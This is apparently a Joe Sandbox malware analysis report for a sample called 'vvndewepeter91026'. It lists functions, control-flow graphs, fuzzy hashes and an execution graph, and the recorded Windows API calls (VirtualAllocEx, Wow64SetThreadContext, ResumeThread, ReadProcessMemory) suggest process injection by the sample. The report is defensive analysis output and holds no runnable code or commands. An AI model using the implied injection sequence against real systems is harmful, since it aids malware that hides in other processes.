                                                control_flow_graph 221 26c2f8-26c3c0 ReadProcessMemory 224 26c3c2-26c3c8 221->224 225 26c3c9-26c41b 221->225 224->225
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0026C3AA
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.402461987.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_260000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: f5f323a72181d8c11241d0595191ee3a20020532fa8ae83c59ac981b1291f573
                                                • Instruction ID: 73cd64871dbc6ca42282a60f8b250793b415482c7cb62ea50707be5e5a28913b
                                                • Opcode Fuzzy Hash: f5f323a72181d8c11241d0595191ee3a20020532fa8ae83c59ac981b1291f573
                                                • Instruction Fuzzy Hash: 4B4199B9D00259DFCF00CFA9D884AEEFBB1BB49314F20942AE814B7210D775AA55CF64
                                                Function 0026C068 Relevance: 1.6, APIs: 1, Instructions: 105memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 230 26c068-26c130 VirtualAllocEx 233 26c132-26c138 230->233 234 26c139-26c183 230->234 233->234
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0026C11A
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.402461987.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_260000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 66214713405d53295970267d199e6b8654f476df0d460066f80ca4a05d8ae682
                                                • Instruction ID: 66923d21d672ce0668fa4399b09514682425b9bf0cd216a4f8b842bb2ec778b3
                                                • Opcode Fuzzy Hash: 66214713405d53295970267d199e6b8654f476df0d460066f80ca4a05d8ae682
                                                • Instruction Fuzzy Hash: 9C41A9B9D00248DFCF10CFA9D984AEEFBB1BB49310F20942AE819B7211D775A955CF54
                                                Function 0026C070 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 239 26c070-26c130 VirtualAllocEx 242 26c132-26c138 239->242 243 26c139-26c183 239->243 242->243
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0026C11A
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.402461987.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_260000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 7cee802a76023a0afef2042cc824940d3ff8aab71337df6a40a8ee059db78426
                                                • Instruction ID: d87b40d53c0345fc242bb11469ee9b38d6d8351a5751699029fb4bc32ee50e6c
                                                • Opcode Fuzzy Hash: 7cee802a76023a0afef2042cc824940d3ff8aab71337df6a40a8ee059db78426
                                                • Instruction Fuzzy Hash: 164199B8D00259DFCF10CFA9D984AEEFBB1BB49310F20942AE814B7210D775A955CF64
                                                Function 0026BF39 Relevance: 1.6, APIs: 1, Instructions: 98threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 248 26bf39-26bfa0 250 26bfb7-26c005 Wow64SetThreadContext 248->250 251 26bfa2-26bfb4 248->251 253 26c007-26c00d 250->253 254 26c00e-26c05a 250->254 251->250 253->254
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 0026BFEF
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.402461987.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_260000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 166b084e050ddb47a206a45ca18596607d41377aa8a0807c49c7c12275f10a8e
                                                • Instruction ID: fa4d90d857c8e4463a84ca9e7990496d9d23627c961ac86c1ba32bb2f574cde2
                                                • Opcode Fuzzy Hash: 166b084e050ddb47a206a45ca18596607d41377aa8a0807c49c7c12275f10a8e
                                                • Instruction Fuzzy Hash: D241DEB4D10258DFDB10CFA9D884AEEFBB0BF48314F24842AE418B7250C778AA85CF54
                                                Function 0026BF40 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 259 26bf40-26bfa0 261 26bfb7-26c005 Wow64SetThreadContext 259->261 262 26bfa2-26bfb4 259->262 264 26c007-26c00d 261->264 265 26c00e-26c05a 261->265 262->261 264->265
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 0026BFEF
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.402461987.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_260000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 0b384fbb3873d9b764f5a97a2582dbc913f50c089669b1d3f8c8b060b64ebb79
                                                • Instruction ID: dc464cd96a6c30d43d452c8c3e230db372965581da4888f01f56fa94cc821d6e
                                                • Opcode Fuzzy Hash: 0b384fbb3873d9b764f5a97a2582dbc913f50c089669b1d3f8c8b060b64ebb79
                                                • Instruction Fuzzy Hash: 1E41CDB4D10259DFDB10CFA9D884AEEFBB1BF49314F24802AE414B7250D778AA85CF54
                                                Function 0026BE48 Relevance: 1.6, APIs: 1, Instructions: 77threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 270 26be48-26bee4 ResumeThread 274 26bee6-26beec 270->274 275 26beed-26bf2f 270->275 274->275
                                                APIs
                                                • ResumeThread.KERNELBASE(?), ref: 0026BECE
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.402461987.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_260000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 7fd3f526a89045d18d5ae44d61960c9b11a8c450eeb20b65ed48f215c8ee36f9
                                                • Instruction ID: 251103b53006ca6f06ddd8dba3caa12fcd012993873699c2945dad5f09e9faad
                                                • Opcode Fuzzy Hash: 7fd3f526a89045d18d5ae44d61960c9b11a8c450eeb20b65ed48f215c8ee36f9
                                                • Instruction Fuzzy Hash: 5531C9B4D102189FDB10CFAAD884AEEFBB0BF89314F24842AE814B7210C775A941CF94
                                                Function 0026BE50 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ResumeThread.KERNELBASE(?), ref: 0026BECE
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.402461987.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_260000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 44b2e2e284a249370d7745265b2bd4179331824b1c29dfb901797ab916c2ee99
                                                • Instruction ID: e18e5c887a1a547bd97dbf241d67c51933c986c43d68a08d5d6624a43ce9e2ab
                                                • Opcode Fuzzy Hash: 44b2e2e284a249370d7745265b2bd4179331824b1c29dfb901797ab916c2ee99
                                                • Instruction Fuzzy Hash: CA31B9B4D102199FDB10CFA9D884AEEFBB5AB89314F24942AE814B7210C775A945CF94
                                                Function 0017D01C Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.402253786.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17d000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bd6fd18acc8e37e50dd70a359d9bb687e6d02c16e97f81e27676430426d9e670
                                                • Instruction ID: 0b2ddbfd10e2ff5d446c0c0d4a4412be6ef84b4a58ae6851a62b0e99a6bb460a
                                                • Opcode Fuzzy Hash: bd6fd18acc8e37e50dd70a359d9bb687e6d02c16e97f81e27676430426d9e670
                                                • Instruction Fuzzy Hash: 8621AF75604348DFDB14DF14E984B16BB75EF84314F24C5A9E84D4B246C33AD846CAA1
                                                Function 0017D006 Relevance: .1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.402253786.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17d000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3ca6e77733a1bc4370c5cd5a8accd55aad9886512577d01f9972c8f046a7e0c8
                                                • Instruction ID: 9f9060f107f74ee681e090ab99305f72c45753d6aa99fcca5954098ee0e58e08
                                                • Opcode Fuzzy Hash: 3ca6e77733a1bc4370c5cd5a8accd55aad9886512577d01f9972c8f046a7e0c8
                                                • Instruction Fuzzy Hash: 99217C755093848FDB12CF20D994B15BF71EF46314F28C5EAD8498B2A7C33A994ACB62

                                                Non-executed Functions

                                                Function 0026B160 Relevance: .3, Instructions: 312COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.402461987.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_260000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6e70e957215d4aba219be275920d3e11c34fe74fa24a2147b732284247c863a1
                                                • Instruction ID: 81f69e2da509c98034b12b6cc26d74adcd8dfc11d93c6d5cd23d24aba59e1032
                                                • Opcode Fuzzy Hash: 6e70e957215d4aba219be275920d3e11c34fe74fa24a2147b732284247c863a1
                                                • Instruction Fuzzy Hash: 97E11974E101598FDB15DFA9C580AADBBF2FF89304F248169D814AB356DB30A982CF60
                                                Function 0026A408 Relevance: .3, Instructions: 312COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.402461987.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_260000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3bb9545e80b3af814baf23246bdbf8c1cd81b94a4173296fe63d641bd83717c2
                                                • Instruction ID: 8ca0e4f7cfacad675a25e6bba26a222ed3cc358c82ac5b761abb61891643738d
                                                • Opcode Fuzzy Hash: 3bb9545e80b3af814baf23246bdbf8c1cd81b94a4173296fe63d641bd83717c2
                                                • Instruction Fuzzy Hash: F8E1F774E101598FDB14DFA8C580AADBBF2FF89304F248169D815AB356DB34AD42CFA1
                                                Function 0026B598 Relevance: .3, Instructions: 312COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.402461987.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_260000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 742a3a0ec690eff94d40985ae6e20229f735e997098325addde17f63345f3b26
                                                • Instruction ID: 01e1f241ce284f7e40017ca36ffb6c3ee1dc15efe5fb2427b8918d79a60333b6
                                                • Opcode Fuzzy Hash: 742a3a0ec690eff94d40985ae6e20229f735e997098325addde17f63345f3b26
                                                • Instruction Fuzzy Hash: 4FE10874E101598FDB15DFA9C580AAEFBF2FF89304F248169D814AB356D734A981CFA0
                                                Function 0026A840 Relevance: .3, Instructions: 312COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.402461987.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_260000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 281a2ab3d23fa3008f37158e1745bfd16b1bbe36d22d91008565f48d09ddbcd4
                                                • Instruction ID: 21491b84a57e805d92fdfe76fb2c391219db5a4caf1c7822bdf5a68f0a73a6c7
                                                • Opcode Fuzzy Hash: 281a2ab3d23fa3008f37158e1745bfd16b1bbe36d22d91008565f48d09ddbcd4
                                                • Instruction Fuzzy Hash: 4CE1F774E101598FDB14DFA8C580AADBBF2FF89304F248169D815AB356D734AD82CF61
                                                Function 0026AC78 Relevance: .3, Instructions: 312COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.402461987.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_260000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5895ef85b2386134493c71fa217a4d98af7a0145109c3aac8d3a5e4c4fec8cb6
                                                • Instruction ID: 18b541ff944ef6155fbcbe764526beda037c11a8ff6ca206e59f85e3335e07ec
                                                • Opcode Fuzzy Hash: 5895ef85b2386134493c71fa217a4d98af7a0145109c3aac8d3a5e4c4fec8cb6
                                                • Instruction Fuzzy Hash: 50E10874E101598FDB14DFA8C580AAEFBF2FF89304F248169D814AB356D735A981CFA1
                                                Function 0026B588 Relevance: .1, Instructions: 134COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.402461987.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_260000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bf14ef52f8aa4290370a2a18c5f8c5282a2ceacf2b79ffbb2b033772e686e184
                                                • Instruction ID: 58e8a351326acebda2bf88c6cda00cc8747115636d65edde0fff10d0d4aa9aeb
                                                • Opcode Fuzzy Hash: bf14ef52f8aa4290370a2a18c5f8c5282a2ceacf2b79ffbb2b033772e686e184
                                                • Instruction Fuzzy Hash: 17515D74E142198FDB15DFA9C5815AEFBF2FF89304F248169D408AB316D7349982CFA0

                                                Execution Graph

                                                Execution Coverage:5.8%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:15.7%
                                                Total number of Nodes:70
                                                Total number of Limit Nodes:0
                                                execution_graph 32577 235500 32578 23550c 32577->32578 32590 23903a 32578->32590 32579 2355ab 32601 608738 32579->32601 32607 608748 32579->32607 32580 2357d4 32613 c14330 32580->32613 32619 c14325 32580->32619 32581 2358e5 32625 5f9635 32581->32625 32631 5f9640 32581->32631 32582 235c18 32592 23906a 32590->32592 32591 239451 32591->32579 32592->32591 32637 23e2ab 32592->32637 32641 23deb9 32592->32641 32645 23dec8 32592->32645 32593 2391bb KiUserExceptionDispatcher 32594 239136 32593->32594 32594->32591 32594->32593 32649 c32ac9 32594->32649 32653 c32c73 32594->32653 32657 c32ad8 32594->32657 32602 60876a 32601->32602 32603 60883d 32602->32603 32604 23e2ab LdrInitializeThunk 32602->32604 32605 23deb9 LdrInitializeThunk 32602->32605 32606 23dec8 LdrInitializeThunk 32602->32606 32603->32580 32604->32603 32605->32603 32606->32603 32608 60876a 32607->32608 32609 60883d 32608->32609 32610 23e2ab LdrInitializeThunk 32608->32610 32611 23deb9 LdrInitializeThunk 32608->32611 32612 23dec8 LdrInitializeThunk 32608->32612 32609->32580 32610->32609 32611->32609 32612->32609 32614 c1434c 32613->32614 32615 c143f7 32614->32615 32616 23e2ab LdrInitializeThunk 32614->32616 32617 23deb9 LdrInitializeThunk 32614->32617 32618 23dec8 LdrInitializeThunk 32614->32618 32615->32581 32616->32615 32617->32615 32618->32615 32620 c1432c 32619->32620 32621 c143f7 32620->32621 32622 23e2ab LdrInitializeThunk 32620->32622 32623 23deb9 LdrInitializeThunk 32620->32623 32624 23dec8 LdrInitializeThunk 32620->32624 32621->32581 32622->32621 32623->32621 32624->32621 32626 5f9640 32625->32626 32627 5f9707 32626->32627 32628 23e2ab LdrInitializeThunk 32626->32628 32629 23deb9 LdrInitializeThunk 32626->32629 32630 23dec8 LdrInitializeThunk 32626->32630 32627->32582 32628->32627 32629->32627 32630->32627 32632 5f965c 32631->32632 32633 5f9707 32632->32633 32634 23e2ab LdrInitializeThunk 32632->32634 32635 23deb9 LdrInitializeThunk 32632->32635 32636 23dec8 LdrInitializeThunk 32632->32636 32633->32582 32634->32633 32635->32633 32636->32633 32640 23e163 LdrInitializeThunk 32637->32640 32639 23e400 32639->32594 32640->32639 32644 23dec0 32641->32644 32642 23e059 32642->32594 32643 23e3e8 LdrInitializeThunk 32643->32642 32644->32642 32644->32643 32648 23def9 32645->32648 32646 23e059 32646->32594 32647 23e3e8 LdrInitializeThunk 32647->32646 32648->32646 32648->32647 32650 c32aff 32649->32650 32651 c32c2a LdrInitializeThunk 32650->32651 32652 c32c1b 32650->32652 32651->32652 32652->32594 32655 c32b37 32653->32655 32654 c32c1b 32654->32594 32655->32654 32656 c32c2a LdrInitializeThunk 32655->32656 32656->32654 32660 c32aff 32657->32660 32658 c32c2a LdrInitializeThunk 32659 c32c1b 32658->32659 32659->32594 32660->32658 32660->32659

                                                Executed Functions

                                                Function 0023DEC8 Relevance: 1.9, APIs: 1, Instructions: 357COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 956 23dec8-23def7 957 23def9 956->957 958 23defe-23df94 956->958 957->958 960 23e033-23e039 958->960 961 23df99-23dfac 960->961 962 23e03f-23e057 960->962 965 23dfb3-23dfbd 961->965 966 23dfae 961->966 963 23e06b-23e07e 962->963 964 23e059-23e066 962->964 968 23e080 963->968 969 23e085-23e0a1 963->969 967 23e400-23e4fc 964->967 970 23dfc4-23e004 965->970 966->965 974 23e504-23e50e 967->974 975 23e4fe-23e503 967->975 968->969 972 23e0a3 969->972 973 23e0a8-23e0cc 969->973 983 23e017-23e029 970->983 984 23e006-23e014 970->984 972->973 979 23e0d3-23e105 973->979 980 23e0ce 973->980 975->974 988 23e107 979->988 989 23e10c-23e14e 979->989 980->979 985 23e030 983->985 986 23e02b 983->986 984->962 985->960 986->985 988->989 991 23e150 989->991 992 23e155-23e15e 989->992 991->992 993 23e385-23e38b 992->993 994 23e163-23e188 993->994 995 23e391-23e3a4 993->995 998 23e18a 994->998 999 23e18f-23e1c5 994->999 996 23e3a6 995->996 997 23e3ab-23e3c6 995->997 996->997 1000 23e3c8 997->1000 1001 23e3cd-23e3e1 997->1001 998->999 1007 23e1c7 999->1007 1008 23e1cc-23e1fe 999->1008 1000->1001 1005 23e3e3 1001->1005 1006 23e3e8-23e3fe LdrInitializeThunk 1001->1006 1005->1006 1006->967 1007->1008 1010 23e262-23e275 1008->1010 1011 23e200-23e225 1008->1011 1012 23e277 1010->1012 1013 23e27c-23e2a1 1010->1013 1014 23e227 1011->1014 1015 23e22c-23e25a 1011->1015 1012->1013 1018 23e2a3-23e2a4 1013->1018 1019 23e2b0-23e2e8 1013->1019 1014->1015 1015->1010 1018->995 1020 23e2ea 1019->1020 1021 23e2ef-23e350 1019->1021 1020->1021 1026 23e352 1021->1026 1027 23e357-23e37b 1021->1027 1026->1027 1030 23e382 1027->1030 1031 23e37d 1027->1031 1030->993 1031->1030
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913048420.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_230000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 59a3e5a8c3ae01643666b257a5b84117e82cd9f22169932ee2fda1bb91c92d8b
                                                • Instruction ID: 37c19d5ed89b369ea68679705fbbd22a243363064d0d3a9b1e152721a4b52609
                                                • Opcode Fuzzy Hash: 59a3e5a8c3ae01643666b257a5b84117e82cd9f22169932ee2fda1bb91c92d8b
                                                • Instruction Fuzzy Hash: 8AF128B4D10218CFDB14DFA5C884B9DFBB2BF88304F1586A9D848AB395DB749986CF50
                                                Function 00236728 Relevance: 1.8, Strings: 1, Instructions: 596COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1032 236728-236748 1033 23674a 1032->1033 1034 23674f-23693b call 230374 * 4 1032->1034 1033->1034 1055 237199-2371af 1034->1055 1056 236940-236949 1055->1056 1057 2371b5-2371f3 1055->1057 1058 236950-23696e 1056->1058 1059 23694b 1056->1059 1060 236974-236996 call 2337e8 1058->1060 1061 23718c-237192 1058->1061 1059->1058 1067 23716f-237185 1060->1067 1061->1055 1063 237194 1061->1063 1063->1055 1069 23699b-2369a4 1067->1069 1070 23718b 1067->1070 1071 2369a6 1069->1071 1072 2369ab-236aca call 230374 call 230394 * 5 1069->1072 1070->1061 1071->1072 1086 236acf-236afc 1072->1086 1087 237132-237151 1086->1087 1088 236b02-236b0e 1086->1088 1091 237153-23715f 1087->1091 1092 237160 1087->1092 1090 236bae-236bc4 1088->1090 1093 236b13-236b1c 1090->1093 1094 236bca-236c90 call 230394 1090->1094 1091->1092 1092->1067 1095 236b23-236b54 call 230394 1093->1095 1096 236b1e 1093->1096 1114 236c92 1094->1114 1115 236c97-236cf2 1094->1115 1102 236b56-236b97 call 230394 1095->1102 1103 236b98-236ba4 1095->1103 1096->1095 1102->1103 1106 236ba6 1103->1106 1107 236bab 1103->1107 1106->1107 1107->1090 1114->1115 1117 236cf4 1115->1117 1118 236cf9-236cfd 1115->1118 1117->1118 1119 236cff-236d0b 1118->1119 1120 236d0d-236d17 1118->1120 1121 236d44-236dd6 call 230394 1119->1121 1122 236d19 1120->1122 1123 236d1e-236d3e 1120->1123 1130 236f72-236f99 1121->1130 1131 236ddc-236e6c 1121->1131 1122->1123 1123->1121 1134 236f9a-237131 1130->1134 1139 236e73-236ece 1131->1139 1140 236e6e 1131->1140 1134->1087 1143 236ed0 1139->1143 1144 236ed5-236ed9 1139->1144 1140->1139 1143->1144 1146 236edb-236ee7 1144->1146 1147 236ee9-236ef3 1144->1147 1148 236f20-236f70 1146->1148 1149 236ef5 1147->1149 1150 236efa-236f1a 1147->1150 1148->1134 1149->1150 1150->1148
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913048420.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_230000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: &55p
                                                • API String ID: 0-1955183375
                                                • Opcode ID: 8bac68278e58cc9ee03800565d749cfedd523a23d4d8cf9c7241ac09b66af336
                                                • Instruction ID: 55238af7e762dc3f9bc60f43fb94cd05d2e78261ded02e2e8c3ec6dd6c975e78
                                                • Opcode Fuzzy Hash: 8bac68278e58cc9ee03800565d749cfedd523a23d4d8cf9c7241ac09b66af336
                                                • Instruction Fuzzy Hash: 60529CB4A01228CFDB64DF65C894BDEBBB2BF89304F1085EAD409A7255DB359E81CF50
                                                Function 0023903A Relevance: 1.8, APIs: 1, Instructions: 271COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1167 23903a-239068 1168 23906a 1167->1168 1169 23906f-239100 1167->1169 1168->1169 1173 239452-239484 1169->1173 1174 239106-239116 1169->1174 1225 239119 call 2397ea 1174->1225 1226 239119 call 2394a8 1174->1226 1177 23911f-23912e 1227 239130 call 23e2ab 1177->1227 1228 239130 call 23deb9 1177->1228 1229 239130 call 23dec8 1177->1229 1178 239136-239152 1180 239154 1178->1180 1181 239159-239162 1178->1181 1180->1181 1182 239445-23944b 1181->1182 1183 239451 1182->1183 1184 239167-239173 1182->1184 1183->1173 1222 239175 call c32c73 1184->1222 1223 239175 call c32ac9 1184->1223 1224 239175 call c32ad8 1184->1224 1185 23917b-2391e1 KiUserExceptionDispatcher 1188 2391e7-239255 call 233858 1185->1188 1189 23929d-2392f8 1185->1189 1199 239257-239297 1188->1199 1200 239298-23929b 1188->1200 1201 2392f9-239347 1189->1201 1199->1200 1200->1201 1206 239430-23943b 1201->1206 1207 23934d-23942f 1201->1207 1209 239442 1206->1209 1210 23943d 1206->1210 1207->1206 1209->1182 1210->1209 1222->1185 1223->1185 1224->1185 1225->1177 1226->1177 1227->1178 1228->1178 1229->1178
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 002391CD
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913048420.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_230000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: 10412998564c2cbfab7f16605136d1365deba8369293f9718cedff21db9f3981
                                                • Instruction ID: 33044bda57839d6f9469a7513dd1b4a5e9ef66af67e4abb4416234b5fe3673f9
                                                • Opcode Fuzzy Hash: 10412998564c2cbfab7f16605136d1365deba8369293f9718cedff21db9f3981
                                                • Instruction Fuzzy Hash: 5DD1A174E00218CFDB54DFA5C994B9EBBB2BF89300F2485AAD809A7355DB359E81CF50
                                                Function 00D60040 Relevance: .7, Instructions: 745COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1746 d60040-d60060 1747 d60067-d600df 1746->1747 1748 d60062 1746->1748 1752 d600e1-d60127 1747->1752 1753 d6012c-d6017e 1747->1753 1748->1747 1760 d601c5-d60278 1752->1760 1753->1760 1761 d60180-d601c4 1753->1761 1771 d60283-d602a9 1760->1771 1761->1760 1773 d60e5e-d60e93 1771->1773 1774 d602af-d603b1 1771->1774 1784 d60e51-d60e57 1774->1784 1785 d603b6-d60493 1784->1785 1786 d60e5d 1784->1786 1794 d60495 1785->1794 1795 d6049a-d60502 1785->1795 1786->1773 1794->1795 1799 d60504 1795->1799 1800 d60509-d6051a 1795->1800 1799->1800 1801 d605a6-d606ac 1800->1801 1802 d60520-d6052a 1800->1802 1820 d606b3-d6071b 1801->1820 1821 d606ae 1801->1821 1803 d60531-d605a5 1802->1803 1804 d6052c 1802->1804 1803->1801 1804->1803 1825 d60722-d60733 1820->1825 1826 d6071d 1820->1826 1821->1820 1827 d607bf-d60972 1825->1827 1828 d60739-d60743 1825->1828 1826->1825 1849 d60974 1827->1849 1850 d60979-d609f6 1827->1850 1829 d60745 1828->1829 1830 d6074a-d607be 1828->1830 1829->1830 1830->1827 1849->1850 1854 d609fd-d60a0e 1850->1854 1855 d609f8 1850->1855 1856 d60a14-d60a1e 1854->1856 1857 d60a9a-d60b33 1854->1857 1855->1854 1858 d60a25-d60a99 1856->1858 1859 d60a20 1856->1859 1867 d60b35 1857->1867 1868 d60b3a-d60bb1 1857->1868 1858->1857 1859->1858 1867->1868 1875 d60bb3 1868->1875 1876 d60bb8-d60bc9 1868->1876 1875->1876 1877 d60cb6-d60d4a 1876->1877 1878 d60bcf-d60c63 1876->1878 1887 d60d50-d60e3b 1877->1887 1888 d60e3c-d60e47 1877->1888 1893 d60c65 1878->1893 1894 d60c6a-d60cb5 1878->1894 1887->1888 1889 d60e4e 1888->1889 1890 d60e49 1888->1890 1889->1784 1890->1889 1893->1894 1894->1877
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913756021.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_d60000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d8ef6ddae64433dfecb16e2d5fe7f126c645971ce73824dd6e2dc5610a2c9a64
                                                • Instruction ID: a063f38d72dc9ea68057f4a5537647efe5ea76d416013a468e71fd5eb747544f
                                                • Opcode Fuzzy Hash: d8ef6ddae64433dfecb16e2d5fe7f126c645971ce73824dd6e2dc5610a2c9a64
                                                • Instruction Fuzzy Hash: BA828D74E012288FDB64DF69C894BDEBBB2AF89300F1485EAD40DA7255DB359E81CF50
                                                Function 00237200 Relevance: .7, Instructions: 718COMMON
